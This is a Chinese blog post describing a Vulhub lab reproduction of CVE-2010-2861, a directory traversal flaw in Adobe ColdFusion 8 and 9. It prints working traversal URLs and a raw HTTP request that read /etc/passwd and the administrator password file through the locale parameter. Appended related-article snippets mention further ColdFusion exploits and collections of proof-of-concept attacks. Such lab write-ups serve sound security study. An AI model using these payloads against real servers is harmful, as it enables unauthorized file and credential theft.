Adobe ColdFusion 目录遍历漏洞 (CVE-2010-2861)

最新推荐文章于 2024-04-22 23:56:52 发布
最新推荐文章于 2024-04-22 23:56:52 发布
阅读量434 收藏 2
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zzzzz1284/article/details/128549695
版权

漏洞环境均基于Vulhub

简介

Adobe ColdFusion 是由 JJ Allaire 于 1995 年创建的商业快速 Web 应用程序开发计算平台。

版本

Adobe ColdFusion 9.0.1 及更早版本中存在目录遍历漏洞,该漏洞允许远程攻击者通过 (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm 的 locale 参数读取任意文件, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, 和 (5) enter.cfm in CFIDE/administrator/.

Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。

复现

访问http://216.127.164.238:8500/CFIDE/administrator/enter.cfm看到初始化页面,输入密码admin初始化整个服务器。

读取/etc/passwd

http://216.127.164.238:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en
GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en HTTP/1.1
Host: 216.127.164.238:8500
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

//带cookie不能成功

读取后台管理员密码

http://216.127.164.238:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en

n1ght_X
关注
Adobe ColdFusion 任意文件读取漏洞复现(CVE-2023-26361)
0xSec
01-28 1041
Adobe ColdFusion平台 filemanager.cfc接口存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
2023年国家护网0day-poc/exp漏洞全汇总(目前已更新到91个..实时更新中...)
08-21 4337
2023年国家护网目前收集到的0day和1day漏洞的poc或者exp大汇总,截止目前已更新到91个漏洞,本文会实时更新,有新的漏洞都会加上
Adobe ColdFusion 反序列化漏洞CVE-2017-3066)
DaWan
04-13 578
Adobe ColdFusion 反序列化漏洞CVE-2017-3066)环境搭建漏洞利用反弹shell 环境搭建 使用vulhub进行环境搭建,具体步骤可参考这里。 漏洞利用 环境启动成功,访问http://192.168.36.128:8500/CFIDE/administrator/index.cfm,输入密码vulhub,即可成功安装Adobe ColdFusion 输入密码后,点击OK,页面如下: 需下载内容 ColdFusionPwn-0.0.1-SNAPSHOT-all.j
漏洞复现----17、Adobe ColdFusion目录遍历漏洞 (CVE-2010-2861)
七天
10-21 1233
文章目录一、漏洞介绍二、漏洞环境1、环境2、Payload三、漏洞复现1、logging/settings.cfm2、datasources/index.cfm3、j2eepackaging/editarchive.cfm4、CFIDE/administrator/settings/mappings.cfm5、CFIDE/administrator/enter.cfm四、特殊构造1、路径后不跟参数值,失败。2、路径后参数值为数字,成功。3、路径后参数值为字母,成功。4、路径后参数值为特殊符号,成功。 一、
Adobe ColdFusion 文件读取漏洞CVE-2010-2861
EC_Carrot的博客
05-20 220
漏洞背景 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 影响版本 Adobe ColdFusion 8.0.1 Adobe ColdFusion 9.0.1 Adobe ColdFusion 9.0 Adobe ColdFusion 8.0 漏洞复现 我的环境为vulhub的靶机,启动后,需访问http://your-ip:8500/CFIDE/administ
09 - vulhub - Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
易编橙 · 终身成长社群,相遇已是上上签!
10-19 3932
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
Adobe ColdFusion文件读取突破(CVE-2010-2861
willow_liang的博客
04-15 284
Adobe ColdFusion文件读取漏洞CVE-2010-2861漏洞复现: Adobe ColdFusion是美国Adobe公司的一种动态Web服务器产品,其运行的CFML(ColdFusion标记语言)是针对Web应用程序的一种程序设计语言。Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 访问该目录 /CFIDE/administrator/enter.cfm?locale=../../../../../../../..
2024HVV在即| 最新漏洞CVE(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 3109
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
cve-2009-1979复现
最新发布
03-13
CVE-2009-1979是Adobe ColdFusion 8及更早版本中存在的一个**目录遍历漏洞**。攻击者可通过构造恶意HTTP请求绕过安全限制,读取服务器上的任意文件(如配置文件、密码文件等)。漏洞原理源于ColdFusion的`locale`...
Java服务器安全漏洞全览:Jackson、WebLogic等案例分析
2. **Adobe ColdFusion任意命令执行漏洞** (CVE-2017-11283, CVE-2017-11284): Adobe ColdFusion存在的漏洞使得攻击者能够执行任意命令,这严重威胁了系统的安全性。 3. **Oracle WebLogic wls-wsat RCE (CVE-2017-...
Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
weixin_46239998的博客
01-01 800
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。由于AJP协议设计存在缺陷导致内部相关的属性可控,攻击者可以构造属性值,使未授权的用户读取服务器任意文件获得敏感信息,甚至可以进行远程代码执行漏洞的利用。Adobe ColdFusion 8、9版本中皆存在一处目录穿越漏洞。管理员密码获取到了,就可以正常玩耍了!三、输入admin初始化环境。五、漏洞利用,读取管理员密码。
ElasticSearch 目录穿越漏洞CVE-2015-3337)
黑白的博客
12-13 2486
声明 好好学习,天天向上 漏洞描述 在安装了具有“site”功能的插件以后,插件目录使用…/即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。 影响范围 1.4.5以下/1.5.2以下 复现过程 这里使用v1.4.4版本 使用vulhub cd /app/vulhub-master/elasticsearch/CVE-2015-3337 使用docker启动 docker-compose up -d 环境启动后,访问http://your-ip:920
Adobe ColdFusion文件读取(CVE-2010-2861)
m0_65150886的博客
01-15 565
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。由于AJP协议设计存在缺陷导致内部相关的属性可控,攻击者可以构造属性值,使未授权的用户读取服务器任意文件获得敏感信息,甚至可以进行远程代码执行漏洞的利用。1.访问http://ip:port,出现如下页面,开始实验。2.构造poc,读取/etc/passwd。3.构造poc,读取后台管理员密码。
coldfusion文件读取漏洞CVE-2010-2861
1stPeak's Blog
07-28 1059
1、直接访问http//your-ip8500/CFIDE/administrator/enter.cfm?/etc/passwd%00en,即可读取文件/etc/passwd。2、读取后台管理员密码http//your-ip8500/CFIDE/administrator/enter.cfm?/lib/password.properties%00en。AdobeColdFusion8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。解密password。...
Adobe_ColdFusion文件读取漏洞 CVE-2010-2861 漏洞复现
ADummy的博客
02-22 1021
Adobe ColdFusion文件读取漏洞(CVE-2010-2861) by ADummy 0x00利用路线 ​ 第三方UI与目标进行通信—>搭建http服务器—>让目标下载恶意文件—>定时任务执行—>反弹shell 0x01漏洞介绍 ​ AdobeColdFusion是一款高效的网络应用服务器开发环境。AdobeColdFusion9.0.1及之前版本的管理控制台中存在多个目录遍历漏洞。远程攻击者可借助向CFIDE/administrator/中的CFIDE/admin
vulhub:Adobe ColdFusion文件读取漏洞复现(CVE-2010-2861
sszsNo1的博客
07-02 399
vulhub:Adobe ColdFusion文件读取漏洞CVE-2010-2861)如何复现
CVE-2010-2861Adobe ColdFusion 文件读取
Foreverlove112的博客
11-08 405
CVE-2010-2861Adobe ColdFusion 文件读取
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值